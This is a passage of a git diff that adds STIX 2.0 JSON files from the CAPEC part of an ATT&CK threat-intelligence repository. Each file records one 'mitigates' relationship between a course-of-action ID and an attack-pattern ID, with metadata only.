+ "id": "bundle--d186d1a6-2cf9-4d05-88c2-ffe8cc6c3453",
+ "objects": [
+ {
+ "created": "2014-06-23T00:00:00.000Z",
+ "created_by_ref": "identity--e50ab59c-5c4f-4d40-bf6a-d58418d89bcd",
+ "id": "relationship--08d00fee-0899-4fb2-b349-7d5a12a13db6",
+ "modified": "2022-09-29T00:00:00.000Z",
+ "object_marking_refs": [
+ "marking-definition--17d82bb2-eeeb-4898-bda5-3ddbcd2b799d"
+ ],
+ "relationship_type": "mitigates",
+ "source_ref": "course-of-action--a1f65809-af95-4549-8285-b7bac44a07b3",
+ "target_ref": "attack-pattern--2a8824eb-4fd0-45a4-9c3c-af3fd7c5e0ca",
+ "type": "relationship",
+ "x_capec_version": "3.9"
+ }
+ ],
+ "spec_version": "2.0",
+ "type": "bundle"
+}
\ No newline at end of file
diff --git a/cti-ATT-CK-v13.1/capec/2.0/relationship/relationship--08d4d25a-ee13-4f19-b709-f7bbafb7d0d9.json b/cti-ATT-CK-v13.1/capec/2.0/relationship/relationship--08d4d25a-ee13-4f19-b709-f7bbafb7d0d9.json
new file mode 100644
index 0000000000000000000000000000000000000000..109af103ca9d12ccd456d928c98690c7a7e8f31c
--- /dev/null
+++ b/cti-ATT-CK-v13.1/capec/2.0/relationship/relationship--08d4d25a-ee13-4f19-b709-f7bbafb7d0d9.json
@@ -0,0 +1,21 @@
+{
+ "id": "bundle--61e5a927-6342-44d8-bef3-0cc26c5851f4",
+ "objects": [
+ {
+ "created": "2014-06-23T00:00:00.000Z",
+ "created_by_ref": "identity--e50ab59c-5c4f-4d40-bf6a-d58418d89bcd",
+ "id": "relationship--08d4d25a-ee13-4f19-b709-f7bbafb7d0d9",
+ "modified": "2021-06-24T00:00:00.000Z",
+ "object_marking_refs": [
+ "marking-definition--17d82bb2-eeeb-4898-bda5-3ddbcd2b799d"
+ ],
+ "relationship_type": "mitigates",
+ "source_ref": "course-of-action--e5c4fb82-e889-429a-a343-f75a01e515dd",
+ "target_ref": "attack-pattern--582943a5-d66c-48a9-8cf8-76e511222c7d",
+ "type": "relationship",
+ "x_capec_version": "3.9"
+ }
+ ],
+ "spec_version": "2.0",
+ "type": "bundle"
+}
\ No newline at end of file
diff --git a/cti-ATT-CK-v13.1/capec/2.0/relationship/relationship--08eb707e-3b00-4b2a-8cf4-aeab56225d0b.json b/cti-ATT-CK-v13.1/capec/2.0/relationship/relationship--08eb707e-3b00-4b2a-8cf4-aeab56225d0b.json
new file mode 100644
index 0000000000000000000000000000000000000000..a713c3a4c94f0a64a9962d8375bea486f4962760
--- /dev/null
+++ b/cti-ATT-CK-v13.1/capec/2.0/relationship/relationship--08eb707e-3b00-4b2a-8cf4-aeab56225d0b.json
@@ -0,0 +1,21 @@
+{
+ "id": "bundle--ef258a5f-94c5-4e90-8b53-62a669bbe927",
+ "objects": [
+ {
+ "created": "2014-06-23T00:00:00.000Z",
+ "created_by_ref": "identity--e50ab59c-5c4f-4d40-bf6a-d58418d89bcd",
+ "id": "relationship--08eb707e-3b00-4b2a-8cf4-aeab56225d0b",
+ "modified": "2022-09-29T00:00:00.000Z",
+ "object_marking_refs": [
+ "marking-definition--17d82bb2-eeeb-4898-bda5-3ddbcd2b799d"
+ ],
+ "relationship_type": "mitigates",
+ "source_ref": "course-of-action--8518d1b7-1b13-4b4b-af0f-f19b9c7f080a",
+ "target_ref": "attack-pattern--374de530-29f4-4e14-905f-809f8cae631d",
+ "type": "relationship",
+ "x_capec_version": "3.9"
+ }
+ ],
+ "spec_version": "2.0",
+ "type": "bundle"
+}
\ No newline at end of file
diff --git a/cti-ATT-CK-v13.1/capec/2.0/relationship/relationship--08eeb157-8c84-4597-82fa-5def0ac9487f.json b/cti-ATT-CK-v13.1/capec/2.0/relationship/relationship--08eeb157-8c84-4597-82fa-5def0ac9487f.json
new file mode 100644
index 0000000000000000000000000000000000000000..c97e7114852711e72657d6da3665884aed44e1f1
--- /dev/null
+++ b/cti-ATT-CK-v13.1/capec/2.0/relationship/relationship--08eeb157-8c84-4597-82fa-5def0ac9487f.json
@@ -0,0 +1,21 @@
+{
+ "id": "bundle--3a8c8351-937f-473f-b805-ebaad6745f18",
+ "objects": [
+ {
+ "created": "2014-06-23T00:00:00.000Z",
+ "created_by_ref": "identity--e50ab59c-5c4f-4d40-bf6a-d58418d89bcd",
+ "id": "relationship--08eeb157-8c84-4597-82fa-5def0ac9487f",
+ "modified": "2022-09-29T00:00:00.000Z",
+ "object_marking_refs": [
+ "marking-definition--17d82bb2-eeeb-4898-bda5-3ddbcd2b799d"
+ ],
+ "relationship_type": "mitigates",
+ "source_ref": "course-of-action--5f830ee1-2df0-423a-a566-4e75e0436eb5",
+ "target_ref": "attack-pattern--51cf3883-1993-49d1-a6c6-169cabf71adb",
+ "type": "relationship",
+ "x_capec_version": "3.9"
+ }
+ ],
+ "spec_version": "2.0",
+ "type": "bundle"
+}
\ No newline at end of file
diff --git a/cti-ATT-CK-v13.1/capec/2.0/relationship/relationship--09525f40-2e8d-420d-a8ee-3893d36113a1.json b/cti-ATT-CK-v13.1/capec/2.0/relationship/relationship--09525f40-2e8d-420d-a8ee-3893d36113a1.json
new file mode 100644
index 0000000000000000000000000000000000000000..ac7b9314adc08a17a9f5c52d92f794d59a326fbf
--- /dev/null
+++ b/cti-ATT-CK-v13.1/capec/2.0/relationship/relationship--09525f40-2e8d-420d-a8ee-3893d36113a1.json
@@ -0,0 +1,21 @@
+{
+ "id": "bundle--8f12bad9-1aea-4a5d-9196-ef486c7bf613",
+ "objects": [
+ {
+ "created": "2014-06-23T00:00:00.000Z",
+ "created_by_ref": "identity--e50ab59c-5c4f-4d40-bf6a-d58418d89bcd",
+ "id": "relationship--09525f40-2e8d-420d-a8ee-3893d36113a1",
+ "modified": "2022-09-29T00:00:00.000Z",
+ "object_marking_refs": [
+ "marking-definition--17d82bb2-eeeb-4898-bda5-3ddbcd2b799d"
+ ],
+ "relationship_type": "mitigates",
+ "source_ref": "course-of-action--948de9b9-7ad6-4bf5-8daf-f2208db360d6",
+ "target_ref": "attack-pattern--ae3f2c33-9018-442e-9cc3-24d65c7f4974",
+ "type": "relationship",
+ "x_capec_version": "3.9"
+ }
+ ],
+ "spec_version": "2.0",
+ "type": "bundle"
+}
\ No newline at end of file
diff --git a/cti-ATT-CK-v13.1/capec/2.0/relationship/relationship--0976b29c-e5cc-4f4e-a4a7-9413d9fa2d92.json b/cti-ATT-CK-v13.1/capec/2.0/relationship/relationship--0976b29c-e5cc-4f4e-a4a7-9413d9fa2d92.json
new file mode 100644
index 0000000000000000000000000000000000000000..b1e4d79573b6bdd00e181fa934ed2ff1dd5c05e7
--- /dev/null
+++ b/cti-ATT-CK-v13.1/capec/2.0/relationship/relationship--0976b29c-e5cc-4f4e-a4a7-9413d9fa2d92.json
@@ -0,0 +1,21 @@
+{
+ "id": "bundle--6bc06784-98c4-4454-b7dc-fa5d98c631b7",
+ "objects": [
+ {
+ "created": "2014-06-23T00:00:00.000Z",
+ "created_by_ref": "identity--e50ab59c-5c4f-4d40-bf6a-d58418d89bcd",
+ "id": "relationship--0976b29c-e5cc-4f4e-a4a7-9413d9fa2d92",
+ "modified": "2022-02-22T00:00:00.000Z",
+ "object_marking_refs": [
+ "marking-definition--17d82bb2-eeeb-4898-bda5-3ddbcd2b799d"
+ ],
+ "relationship_type": "mitigates",
+ "source_ref": "course-of-action--d3d3a8f3-1de8-4410-a757-51b9b0ecc214",
+ "target_ref": "attack-pattern--5f0e5e3b-6889-4583-81ec-5afecbd6765e",
+ "type": "relationship",
+ "x_capec_version": "3.7"
+ }
+ ],
+ "spec_version": "2.0",
+ "type": "bundle"
+}
\ No newline at end of file
diff --git a/cti-ATT-CK-v13.1/capec/2.0/relationship/relationship--0989752b-6aa5-43c2-afc2-0873faa1782e.json b/cti-ATT-CK-v13.1/capec/2.0/relationship/relationship--0989752b-6aa5-43c2-afc2-0873faa1782e.json
new file mode 100644
index 0000000000000000000000000000000000000000..71816e09161281e1081b41cee597a62e75de20f8
--- /dev/null
+++ b/cti-ATT-CK-v13.1/capec/2.0/relationship/relationship--0989752b-6aa5-43c2-afc2-0873faa1782e.json
@@ -0,0 +1,21 @@
+{
+ "id": "bundle--5b8dc9ee-fa91-4e92-97e1-f745693b9c55",
+ "objects": [
+ {
+ "created": "2014-06-23T00:00:00.000Z",
+ "created_by_ref": "identity--e50ab59c-5c4f-4d40-bf6a-d58418d89bcd",
+ "id": "relationship--0989752b-6aa5-43c2-afc2-0873faa1782e",
+ "modified": "2022-02-22T00:00:00.000Z",
+ "object_marking_refs": [
+ "marking-definition--17d82bb2-eeeb-4898-bda5-3ddbcd2b799d"
+ ],
+ "relationship_type": "mitigates",
+ "source_ref": "course-of-action--26850710-b983-423b-962a-5fd4b550fa0e",
+ "target_ref": "attack-pattern--28aff255-abc8-4392-872c-61f78d4fe55b",
+ "type": "relationship",
+ "x_capec_version": "3.9"
+ }
+ ],
+ "spec_version": "2.0",
+ "type": "bundle"
+}
\ No newline at end of file
diff --git a/cti-ATT-CK-v13.1/capec/2.0/relationship/relationship--0993c894-6271-447f-8111-2ee9ee88d8f1.json b/cti-ATT-CK-v13.1/capec/2.0/relationship/relationship--0993c894-6271-447f-8111-2ee9ee88d8f1.json
new file mode 100644
index 0000000000000000000000000000000000000000..6f0a1beb6007683d1cfb76cbc8f4125196e2536c
--- /dev/null
+++ b/cti-ATT-CK-v13.1/capec/2.0/relationship/relationship--0993c894-6271-447f-8111-2ee9ee88d8f1.json
@@ -0,0 +1,21 @@
+{
+ "id": "bundle--72863358-ee14-438b-82b5-375d023b2a88",
+ "objects": [
+ {
+ "created": "2014-06-23T00:00:00.000Z",
+ "created_by_ref": "identity--e50ab59c-5c4f-4d40-bf6a-d58418d89bcd",
+ "id": "relationship--0993c894-6271-447f-8111-2ee9ee88d8f1",
+ "modified": "2022-09-29T00:00:00.000Z",
+ "object_marking_refs": [
+ "marking-definition--17d82bb2-eeeb-4898-bda5-3ddbcd2b799d"
+ ],
+ "relationship_type": "mitigates",
+ "source_ref": "course-of-action--c434bad9-76f4-48d5-8bb3-9c46c4c91696",
+ "target_ref": "attack-pattern--3c9e7b88-a1eb-4cfd-aa34-10df08b23317",
+ "type": "relationship",
+ "x_capec_version": "3.9"
+ }
+ ],
+ "spec_version": "2.0",
+ "type": "bundle"
+}
\ No newline at end of file
diff --git a/cti-ATT-CK-v13.1/capec/2.0/relationship/relationship--09b1f116-7e91-47fc-8238-758d20861790.json b/cti-ATT-CK-v13.1/capec/2.0/relationship/relationship--09b1f116-7e91-47fc-8238-758d20861790.json
new file mode 100644
index 0000000000000000000000000000000000000000..7087cbb366cca5d3772a884772680940a3a78082
--- /dev/null
+++ b/cti-ATT-CK-v13.1/capec/2.0/relationship/relationship--09b1f116-7e91-47fc-8238-758d20861790.json
@@ -0,0 +1,21 @@
+{
+ "id": "bundle--3a749515-0f51-4c9c-82df-d04550bde9c5",
+ "objects": [
+ {
+ "created": "2014-06-23T00:00:00.000Z",
+ "created_by_ref": "identity--e50ab59c-5c4f-4d40-bf6a-d58418d89bcd",
+ "id": "relationship--09b1f116-7e91-47fc-8238-758d20861790",
+ "modified": "2022-09-29T00:00:00.000Z",
+ "object_marking_refs": [
+ "marking-definition--17d82bb2-eeeb-4898-bda5-3ddbcd2b799d"
+ ],
+ "relationship_type": "mitigates",
+ "source_ref": "course-of-action--b77def1e-db69-4204-b59f-c9ba934af034",
+ "target_ref": "attack-pattern--74bac7d9-693d-40d2-82bf-eb132f13bcaf",
+ "type": "relationship",
+ "x_capec_version": "3.9"
+ }
+ ],
+ "spec_version": "2.0",
+ "type": "bundle"
+}
\ No newline at end of file
diff --git a/cti-ATT-CK-v13.1/capec/2.0/relationship/relationship--0a25f5eb-bd9d-4d1e-9877-56cf80a4fc41.json b/cti-ATT-CK-v13.1/capec/2.0/relationship/relationship--0a25f5eb-bd9d-4d1e-9877-56cf80a4fc41.json
new file mode 100644
index 0000000000000000000000000000000000000000..1628880882bf3a88c053f337859ff522f28985bc
--- /dev/null
+++ b/cti-ATT-CK-v13.1/capec/2.0/relationship/relationship--0a25f5eb-bd9d-4d1e-9877-56cf80a4fc41.json
@@ -0,0 +1,21 @@
+{
+ "id": "bundle--6288fcee-c9a8-40f7-8cb3-190ad1d3ed41",
+ "objects": [
+ {
+ "created": "2014-06-23T00:00:00.000Z",
+ "created_by_ref": "identity--e50ab59c-5c4f-4d40-bf6a-d58418d89bcd",
+ "id": "relationship--0a25f5eb-bd9d-4d1e-9877-56cf80a4fc41",
+ "modified": "2022-02-22T00:00:00.000Z",
+ "object_marking_refs": [
+ "marking-definition--17d82bb2-eeeb-4898-bda5-3ddbcd2b799d"
+ ],
+ "relationship_type": "mitigates",
+ "source_ref": "course-of-action--829e2480-f52a-4109-acba-ab3433ccf5a2",
+ "target_ref": "attack-pattern--51d000d6-11a0-461b-98e7-8550beac027b",
+ "type": "relationship",
+ "x_capec_version": "3.7"
+ }
+ ],
+ "spec_version": "2.0",
+ "type": "bundle"
+}
\ No newline at end of file
diff --git a/cti-ATT-CK-v13.1/capec/2.0/relationship/relationship--0a29576b-049b-4956-8b53-ce4e9053139a.json b/cti-ATT-CK-v13.1/capec/2.0/relationship/relationship--0a29576b-049b-4956-8b53-ce4e9053139a.json
new file mode 100644
index 0000000000000000000000000000000000000000..afb71d3c7734376ee66c3e82feb96bc24f94454b
--- /dev/null
+++ b/cti-ATT-CK-v13.1/capec/2.0/relationship/relationship--0a29576b-049b-4956-8b53-ce4e9053139a.json
@@ -0,0 +1,21 @@
+{
+ "id": "bundle--240e1c91-44a9-490a-ae4f-e90f13276083",
+ "objects": [
+ {
+ "created": "2014-06-23T00:00:00.000Z",
+ "created_by_ref": "identity--e50ab59c-5c4f-4d40-bf6a-d58418d89bcd",
+ "id": "relationship--0a29576b-049b-4956-8b53-ce4e9053139a",
+ "modified": "2022-09-29T00:00:00.000Z",
+ "object_marking_refs": [
+ "marking-definition--17d82bb2-eeeb-4898-bda5-3ddbcd2b799d"
+ ],
+ "relationship_type": "mitigates",
+ "source_ref": "course-of-action--7c0264a9-3fa6-4dd3-bf66-e37487316673",
+ "target_ref": "attack-pattern--5dec633b-7b10-4bfe-9270-e68b98112285",
+ "type": "relationship",
+ "x_capec_version": "3.9"
+ }
+ ],
+ "spec_version": "2.0",
+ "type": "bundle"
+}
\ No newline at end of file
diff --git a/cti-ATT-CK-v13.1/capec/2.0/relationship/relationship--0a6d5ff3-ab5c-4c1f-b8ed-5faba969ed04.json b/cti-ATT-CK-v13.1/capec/2.0/relationship/relationship--0a6d5ff3-ab5c-4c1f-b8ed-5faba969ed04.json
new file mode 100644
index 0000000000000000000000000000000000000000..08eae069c6826422a0608a325aeb26705bd39a50
--- /dev/null
+++ b/cti-ATT-CK-v13.1/capec/2.0/relationship/relationship--0a6d5ff3-ab5c-4c1f-b8ed-5faba969ed04.json
@@ -0,0 +1,21 @@
+{
+ "id": "bundle--5fcba091-4c05-4542-934f-1a3b4278017a",
+ "objects": [
+ {
+ "created": "2014-06-23T00:00:00.000Z",
+ "created_by_ref": "identity--e50ab59c-5c4f-4d40-bf6a-d58418d89bcd",
+ "id": "relationship--0a6d5ff3-ab5c-4c1f-b8ed-5faba969ed04",
+ "modified": "2022-09-29T00:00:00.000Z",
+ "object_marking_refs": [
+ "marking-definition--17d82bb2-eeeb-4898-bda5-3ddbcd2b799d"
+ ],
+ "relationship_type": "mitigates",
+ "source_ref": "course-of-action--cb6669ba-434f-4a26-8a80-93eacd1b68f0",
+ "target_ref": "attack-pattern--943fa8f4-b777-4f3c-984b-9f620e50c70b",
+ "type": "relationship",
+ "x_capec_version": "3.9"
+ }
+ ],
+ "spec_version": "2.0",
+ "type": "bundle"
+}
\ No newline at end of file
diff --git a/cti-ATT-CK-v13.1/capec/2.0/relationship/relationship--0aa3c5ce-dade-4c9d-b9cb-cfd13a4fc7b0.json b/cti-ATT-CK-v13.1/capec/2.0/relationship/relationship--0aa3c5ce-dade-4c9d-b9cb-cfd13a4fc7b0.json
new file mode 100644
index 0000000000000000000000000000000000000000..90e2e0f5ead1301df1f8669c096155d25b987271
--- /dev/null
+++ b/cti-ATT-CK-v13.1/capec/2.0/relationship/relationship--0aa3c5ce-dade-4c9d-b9cb-cfd13a4fc7b0.json
@@ -0,0 +1,21 @@
+{
+ "id": "bundle--57213e99-f04b-410c-b608-756427a1e883",
+ "objects": [
+ {
+ "created": "2014-06-23T00:00:00.000Z",
+ "created_by_ref": "identity--e50ab59c-5c4f-4d40-bf6a-d58418d89bcd",
+ "id": "relationship--0aa3c5ce-dade-4c9d-b9cb-cfd13a4fc7b0",
+ "modified": "2020-12-17T00:00:00.000Z",
+ "object_marking_refs": [
+ "marking-definition--17d82bb2-eeeb-4898-bda5-3ddbcd2b799d"
+ ],
+ "relationship_type": "mitigates",
+ "source_ref": "course-of-action--93ed0e66-1693-44b2-b416-bee8db1ad4c2",
+ "target_ref": "attack-pattern--a9dc4914-409a-4f71-80df-c5cc3923d112",
+ "type": "relationship",
+ "x_capec_version": "3.9"
+ }
+ ],
+ "spec_version": "2.0",
+ "type": "bundle"
+}
\ No newline at end of file
diff --git a/cti-ATT-CK-v13.1/capec/2.0/relationship/relationship--0acfa1e9-0c32-4214-b7e0-8051b944e4f1.json b/cti-ATT-CK-v13.1/capec/2.0/relationship/relationship--0acfa1e9-0c32-4214-b7e0-8051b944e4f1.json
new file mode 100644
index 0000000000000000000000000000000000000000..bc86e8f80c62c198b47675ecf5e6565b000c2e9e
--- /dev/null
+++ b/cti-ATT-CK-v13.1/capec/2.0/relationship/relationship--0acfa1e9-0c32-4214-b7e0-8051b944e4f1.json
@@ -0,0 +1,21 @@
+{
+ "id": "bundle--6c82a833-b5c7-4eb8-a803-089c37c80589",
+ "objects": [
+ {
+ "created": "2021-06-24T00:00:00.000Z",
+ "created_by_ref": "identity--e50ab59c-5c4f-4d40-bf6a-d58418d89bcd",
+ "id": "relationship--0acfa1e9-0c32-4214-b7e0-8051b944e4f1",
+ "modified": "2022-09-29T00:00:00.000Z",
+ "object_marking_refs": [
+ "marking-definition--17d82bb2-eeeb-4898-bda5-3ddbcd2b799d"
+ ],
+ "relationship_type": "mitigates",
+ "source_ref": "course-of-action--78bdd0d5-c5e0-4465-a8e8-2a5245673b43",
+ "target_ref": "attack-pattern--5af917a8-becc-41ec-9053-6976a9da5b28",
+ "type": "relationship",
+ "x_capec_version": "3.9"
+ }
+ ],
+ "spec_version": "2.0",
+ "type": "bundle"
+}
\ No newline at end of file
diff --git a/cti-ATT-CK-v13.1/capec/2.0/relationship/relationship--0b609b9c-0b10-497b-b953-c1d279689017.json b/cti-ATT-CK-v13.1/capec/2.0/relationship/relationship--0b609b9c-0b10-497b-b953-c1d279689017.json
new file mode 100644
index 0000000000000000000000000000000000000000..e9f5ac568e140719a0d013d87ee23ca828ba5faf
--- /dev/null
+++ b/cti-ATT-CK-v13.1/capec/2.0/relationship/relationship--0b609b9c-0b10-497b-b953-c1d279689017.json
@@ -0,0 +1,21 @@
+{
+ "id": "bundle--44e860ad-19bf-48b8-9f5a-1c424cf376ae",
+ "objects": [
+ {
+ "created": "2014-06-23T00:00:00.000Z",
+ "created_by_ref": "identity--e50ab59c-5c4f-4d40-bf6a-d58418d89bcd",
+ "id": "relationship--0b609b9c-0b10-497b-b953-c1d279689017",
+ "modified": "2022-09-29T00:00:00.000Z",
+ "object_marking_refs": [
+ "marking-definition--17d82bb2-eeeb-4898-bda5-3ddbcd2b799d"
+ ],
+ "relationship_type": "mitigates",
+ "source_ref": "course-of-action--8a996efc-52e0-4aaf-953a-21c3fe64c64b",
+ "target_ref": "attack-pattern--39322012-07ba-4bfc-bac7-10891614ee3e",
+ "type": "relationship",
+ "x_capec_version": "3.9"
+ }
+ ],
+ "spec_version": "2.0",
+ "type": "bundle"
+}
\ No newline at end of file
diff --git a/cti-ATT-CK-v13.1/capec/2.0/relationship/relationship--0b7db0b5-d1c4-48fa-aef5-d966935fecc5.json b/cti-ATT-CK-v13.1/capec/2.0/relationship/relationship--0b7db0b5-d1c4-48fa-aef5-d966935fecc5.json
new file mode 100644
index 0000000000000000000000000000000000000000..89faaba9a5f970ecd23646980a3fbcf8219f23c9
--- /dev/null
+++ b/cti-ATT-CK-v13.1/capec/2.0/relationship/relationship--0b7db0b5-d1c4-48fa-aef5-d966935fecc5.json
@@ -0,0 +1,21 @@
+{
+ "id": "bundle--b3cb244e-54dd-4ecc-978b-4773abf6f480",
+ "objects": [
+ {
+ "created": "2014-06-23T00:00:00.000Z",
+ "created_by_ref": "identity--e50ab59c-5c4f-4d40-bf6a-d58418d89bcd",
+ "id": "relationship--0b7db0b5-d1c4-48fa-aef5-d966935fecc5",
+ "modified": "2022-09-29T00:00:00.000Z",
+ "object_marking_refs": [
+ "marking-definition--17d82bb2-eeeb-4898-bda5-3ddbcd2b799d"
+ ],
+ "relationship_type": "mitigates",
+ "source_ref": "course-of-action--00b17d50-1313-4019-81d7-ac8cfda42439",
+ "target_ref": "attack-pattern--5b2d7149-c0f3-4b42-9c10-febe7dfd3ea5",
+ "type": "relationship",
+ "x_capec_version": "3.9"
+ }
+ ],
+ "spec_version": "2.0",
+ "type": "bundle"
+}
\ No newline at end of file
diff --git a/cti-ATT-CK-v13.1/capec/2.0/relationship/relationship--0b7e3a6f-e895-4472-8fb2-87fd4ae495ac.json b/cti-ATT-CK-v13.1/capec/2.0/relationship/relationship--0b7e3a6f-e895-4472-8fb2-87fd4ae495ac.json
new file mode 100644
index 0000000000000000000000000000000000000000..6de2fa6e106b3e94a8ca06ab4b86a30378b6561c
--- /dev/null
+++ b/cti-ATT-CK-v13.1/capec/2.0/relationship/relationship--0b7e3a6f-e895-4472-8fb2-87fd4ae495ac.json
@@ -0,0 +1,21 @@
+{
+ "id": "bundle--0c86d3a4-7ccf-4145-bfaa-43805442105f",
+ "objects": [
+ {
+ "created": "2014-06-23T00:00:00.000Z",
+ "created_by_ref": "identity--e50ab59c-5c4f-4d40-bf6a-d58418d89bcd",
+ "id": "relationship--0b7e3a6f-e895-4472-8fb2-87fd4ae495ac",
+ "modified": "2022-09-29T00:00:00.000Z",
+ "object_marking_refs": [
+ "marking-definition--17d82bb2-eeeb-4898-bda5-3ddbcd2b799d"
+ ],
+ "relationship_type": "mitigates",
+ "source_ref": "course-of-action--c4fec7a6-c3eb-48d8-b840-e4fad7c771c8",
+ "target_ref": "attack-pattern--b5618a54-4646-423d-8676-b2eb56dd4328",
+ "type": "relationship",
+ "x_capec_version": "3.9"
+ }
+ ],
+ "spec_version": "2.0",
+ "type": "bundle"
+}
\ No newline at end of file
diff --git a/cti-ATT-CK-v13.1/capec/2.0/relationship/relationship--0bde6497-61aa-43b6-b9ed-7a55f500f332.json b/cti-ATT-CK-v13.1/capec/2.0/relationship/relationship--0bde6497-61aa-43b6-b9ed-7a55f500f332.json
new file mode 100644
index 0000000000000000000000000000000000000000..2744e2b802a72cb6da4258671851bb2279bf3d97
--- /dev/null
+++ b/cti-ATT-CK-v13.1/capec/2.0/relationship/relationship--0bde6497-61aa-43b6-b9ed-7a55f500f332.json
@@ -0,0 +1,21 @@
+{
+ "id": "bundle--3e481095-44e2-4cd7-b0c9-16d3c03c94d2",
+ "objects": [
+ {
+ "created": "2014-06-23T00:00:00.000Z",
+ "created_by_ref": "identity--e50ab59c-5c4f-4d40-bf6a-d58418d89bcd",
+ "id": "relationship--0bde6497-61aa-43b6-b9ed-7a55f500f332",
+ "modified": "2021-06-24T00:00:00.000Z",
+ "object_marking_refs": [
+ "marking-definition--17d82bb2-eeeb-4898-bda5-3ddbcd2b799d"
+ ],
+ "relationship_type": "mitigates",
+ "source_ref": "course-of-action--638372f7-a792-4269-acd6-cfb761391fd6",
+ "target_ref": "attack-pattern--649abc91-f615-4c9e-91c9-9e66131e2d78",
+ "type": "relationship",
+ "x_capec_version": "3.9"
+ }
+ ],
+ "spec_version": "2.0",
+ "type": "bundle"
+}
\ No newline at end of file
diff --git a/cti-ATT-CK-v13.1/capec/2.0/relationship/relationship--0bdf0b48-2a70-4e88-bdb6-5b0ec07841b0.json b/cti-ATT-CK-v13.1/capec/2.0/relationship/relationship--0bdf0b48-2a70-4e88-bdb6-5b0ec07841b0.json
new file mode 100644
index 0000000000000000000000000000000000000000..63aadfe69d90ea0c318c095d1b20a6f44d3457d3
--- /dev/null
+++ b/cti-ATT-CK-v13.1/capec/2.0/relationship/relationship--0bdf0b48-2a70-4e88-bdb6-5b0ec07841b0.json
@@ -0,0 +1,21 @@
+{
+ "id": "bundle--32b37420-2ec4-49ec-ae62-3803f1e60b51",
+ "objects": [
+ {
+ "created": "2014-06-23T00:00:00.000Z",
+ "created_by_ref": "identity--e50ab59c-5c4f-4d40-bf6a-d58418d89bcd",
+ "id": "relationship--0bdf0b48-2a70-4e88-bdb6-5b0ec07841b0",
+ "modified": "2022-09-29T00:00:00.000Z",
+ "object_marking_refs": [
+ "marking-definition--17d82bb2-eeeb-4898-bda5-3ddbcd2b799d"
+ ],
+ "relationship_type": "mitigates",
+ "source_ref": "course-of-action--6bd7c5b7-b55f-4fac-a850-306a427dbaf8",
+ "target_ref": "attack-pattern--a7cc8cb3-8652-4669-893a-baaa21f7eb55",
+ "type": "relationship",
+ "x_capec_version": "3.9"
+ }
+ ],
+ "spec_version": "2.0",
+ "type": "bundle"
+}
\ No newline at end of file
diff --git a/cti-ATT-CK-v13.1/capec/2.0/relationship/relationship--0c333c67-716a-4a61-8bf6-5f10bc34123e.json b/cti-ATT-CK-v13.1/capec/2.0/relationship/relationship--0c333c67-716a-4a61-8bf6-5f10bc34123e.json
new file mode 100644
index 0000000000000000000000000000000000000000..a965afe297749cb8a527a3130a5c01d1dc1d169a
--- /dev/null
+++ b/cti-ATT-CK-v13.1/capec/2.0/relationship/relationship--0c333c67-716a-4a61-8bf6-5f10bc34123e.json
@@ -0,0 +1,21 @@
+{
+ "id": "bundle--5f7b4dd6-77ff-4a89-820d-7cc97e59b731",
+ "objects": [
+ {
+ "created": "2014-06-23T00:00:00.000Z",
+ "created_by_ref": "identity--e50ab59c-5c4f-4d40-bf6a-d58418d89bcd",
+ "id": "relationship--0c333c67-716a-4a61-8bf6-5f10bc34123e",
+ "modified": "2022-02-22T00:00:00.000Z",
+ "object_marking_refs": [
+ "marking-definition--17d82bb2-eeeb-4898-bda5-3ddbcd2b799d"
+ ],
+ "relationship_type": "mitigates",
+ "source_ref": "course-of-action--f1b328f3-e5f7-4c0b-8cd1-92c178d9dffa",
+ "target_ref": "attack-pattern--521348c2-b1df-492f-ac83-1f3ffe102046",
+ "type": "relationship",
+ "x_capec_version": "3.9"
+ }
+ ],
+ "spec_version": "2.0",
+ "type": "bundle"
+}
\ No newline at end of file
diff --git a/cti-ATT-CK-v13.1/capec/2.0/relationship/relationship--e3d2b93d-bd3c-47a7-a5fc-75b3c56d634b.json b/cti-ATT-CK-v13.1/capec/2.0/relationship/relationship--e3d2b93d-bd3c-47a7-a5fc-75b3c56d634b.json
new file mode 100644
index 0000000000000000000000000000000000000000..6a6f3a004eca05d8ef3b877f13a3e92ee5fa9239
--- /dev/null
+++ b/cti-ATT-CK-v13.1/capec/2.0/relationship/relationship--e3d2b93d-bd3c-47a7-a5fc-75b3c56d634b.json
@@ -0,0 +1,21 @@
+{
+ "id": "bundle--cdcbb2bf-523f-4650-ad17-ab00af58abcf",
+ "objects": [
+ {
+ "created": "2014-06-23T00:00:00.000Z",
+ "created_by_ref": "identity--e50ab59c-5c4f-4d40-bf6a-d58418d89bcd",
+ "id": "relationship--e3d2b93d-bd3c-47a7-a5fc-75b3c56d634b",
+ "modified": "2022-02-22T00:00:00.000Z",
+ "object_marking_refs": [
+ "marking-definition--17d82bb2-eeeb-4898-bda5-3ddbcd2b799d"
+ ],
+ "relationship_type": "mitigates",
+ "source_ref": "course-of-action--3b11fd1d-aa44-4c8f-a3ae-438fa37413a5",
+ "target_ref": "attack-pattern--581433c0-1d73-4975-80f1-6dcee4761bbc",
+ "type": "relationship",
+ "x_capec_version": "3.9"
+ }
+ ],
+ "spec_version": "2.0",
+ "type": "bundle"
+}
\ No newline at end of file
diff --git a/cti-ATT-CK-v13.1/capec/2.0/relationship/relationship--e626d148-d65c-4d3a-b600-e59852d41f84.json b/cti-ATT-CK-v13.1/capec/2.0/relationship/relationship--e626d148-d65c-4d3a-b600-e59852d41f84.json
new file mode 100644
index 0000000000000000000000000000000000000000..b26a55cb3dd95fc4e9edcdbec3d9265d02bd0056
--- /dev/null
+++ b/cti-ATT-CK-v13.1/capec/2.0/relationship/relationship--e626d148-d65c-4d3a-b600-e59852d41f84.json
@@ -0,0 +1,21 @@
+{
+ "id": "bundle--20f51183-7658-4503-8506-a36481c928d2",
+ "objects": [
+ {
+ "created": "2014-06-23T00:00:00.000Z",
+ "created_by_ref": "identity--e50ab59c-5c4f-4d40-bf6a-d58418d89bcd",
+ "id": "relationship--e626d148-d65c-4d3a-b600-e59852d41f84",
+ "modified": "2022-09-29T00:00:00.000Z",
+ "object_marking_refs": [
+ "marking-definition--17d82bb2-eeeb-4898-bda5-3ddbcd2b799d"
+ ],
+ "relationship_type": "mitigates",
+ "source_ref": "course-of-action--f021edf5-f2c1-49c5-b1b9-a07bd11d1aec",
+ "target_ref": "attack-pattern--f7fd56fe-cc88-4200-907a-8ea3b89e1ddb",
+ "type": "relationship",
+ "x_capec_version": "3.9"
+ }
+ ],
+ "spec_version": "2.0",
+ "type": "bundle"
+}
\ No newline at end of file
